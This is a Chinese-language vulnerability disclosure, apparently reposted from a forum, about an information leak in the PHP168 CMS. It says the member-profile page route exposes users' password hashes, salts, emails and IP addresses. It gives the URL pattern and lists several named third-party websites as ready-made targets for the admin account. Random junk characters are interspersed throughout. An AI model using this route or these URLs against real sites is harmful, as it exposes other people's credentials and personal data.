|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile
2 M5 `' I4 R: i3 h
- b, n) z) c" Q$ Z以PHP168官方演示站点为例,查看任意用户信息的页面链接为:
6 W6 c( } g& x: j$ F- m$ e' }' z* x+ d
http://php168.cn/com/homepage.php/admin/member-profile1 Q3 A2 U* n V
' d" M, K7 [* f* U% p( M
由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。4 [) [. P1 W* ]* x
http://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg
& O% x" o2 @- s1 G0 T1 b6 T4 D& H' ^$ _& `: t
漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:
) {9 S) }6 |/ M* E0 H! [2 X/ u8 Z. C3 n W3 W7 @; ]+ o, c" a" O
http://www.zjfzol.com.cn/homepage.php/admin/member-profile
) m, A% g& R! a! v7 U" N0 I) O6 n- a' K
; M! Q+ d; m$ W2 d4 M% [: f- m! F+ \+ uhttp://www.scswl.cn/homepage.php/admin/member-profile. @; g8 U: h+ |+ j9 @$ w. V% s
$ Z3 `1 W/ T& B6 o9 }http://www.tunet.edu.cn/homepage.php/admin/member-profile8 ?9 E, A& u5 ?- a$ `2 y* [) l
% E3 C' k h) M7 e s
http://www.itlead.com.cn/homepage.php/admin/member-profile
7 Y) @5 L' x& z, T+ a E; x6 M* e( G7 e- x
http://www.aedp.cn/homepage.php/admin/member-profile
7 [ ~0 ^0 I$ g" h. ~& u9 N: I8 A7 t6 o* L
http://www.qianlongnews.com/homepage.php/test/member-profile
8 n- u& j% a5 g, _" l6 l% k
3 N7 K5 C1 k6 x. a; J/ P5 l R' Ahttp://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]
& w" F; Y# H0 y1 J1 l" O6 a8 D) H[/table] |